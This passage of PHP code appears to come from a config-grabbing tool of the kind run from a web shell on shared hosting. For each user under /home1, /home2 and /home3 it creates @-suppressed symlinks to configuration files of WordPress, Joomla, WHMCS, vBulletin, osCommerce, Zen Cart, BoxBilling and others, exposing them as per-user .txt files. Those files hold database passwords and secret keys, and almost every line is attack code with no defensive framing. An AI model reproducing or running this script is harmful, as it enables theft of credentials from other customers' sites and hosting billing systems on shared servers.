  1050. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1051. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1052. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1053. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1054. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1055. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1056. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1057. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1058. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1059. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1060. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1061. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1062. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1063. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1064. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1065. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1066. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1067. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1068. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1069. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1070. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1071. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1072. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1073. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1074. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1075. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1076. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1077. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1078. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1079.  
  1080. //Home2
  1081.  
  1082. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1083. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1084. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1085. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1086. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1087. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1088. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1089. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1090. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1091. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1092. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1093. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1094. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1095. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1096. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1097. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1098. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1099. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1100. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1101. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1102. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1103. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1104. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1105. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1106. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1107. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1108. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1109. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1110. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1111. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1112. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1113. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1114. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1115. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1116. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1117. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1118. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1119. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1120. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1121. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1122. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1123. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1124. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1125. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1126. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1127. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1128. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1129. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1130. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1131. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1132. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1133. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1134. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1135. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1136. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1137. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1138. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1139. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1140. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1141. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1142. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1143. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1144. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1145. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1146. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1147. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1148. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1149. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1150. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1151. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1152. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1153. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1154. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1155. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1156. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1157. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1158. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1159. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1160. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1161. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1162. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1163. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1164. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1165. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1166. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1167. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1168. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1169. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1170. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1171. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1172. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1173. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1174. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1175. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1176. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1177. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1178. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1179. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1180. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1181. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1182. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1183. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1221. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1222. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1223. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1224. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1225. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1226. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1227. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1228. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1229. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1230. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1231. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1232. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1233. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1234. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1235. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1236. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1237. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1238. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1239. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1240. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1241. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1242. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1243. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1244. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1245. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1246. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1247. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1248. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1249. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1250. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1251. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1252. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1253. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1254. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1255. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1256. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1257. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1258. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1259. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1260. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1261. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1262.  
  1263. //Home3
  1264.  
  1265. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1266. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1267. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1268. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1269. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1270. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1271. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1272. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1273. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1274. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1275. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1276. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1277. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1278. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1282. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1283. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1286. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1287. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1288. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1289. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1290. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1291. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1292. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1293. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1294. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1295. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1296. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1297. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1298. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1299. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1300. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1301. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1302. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1303. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1304. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1305. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1306. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1307. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1308. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1309. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1310. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1311. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
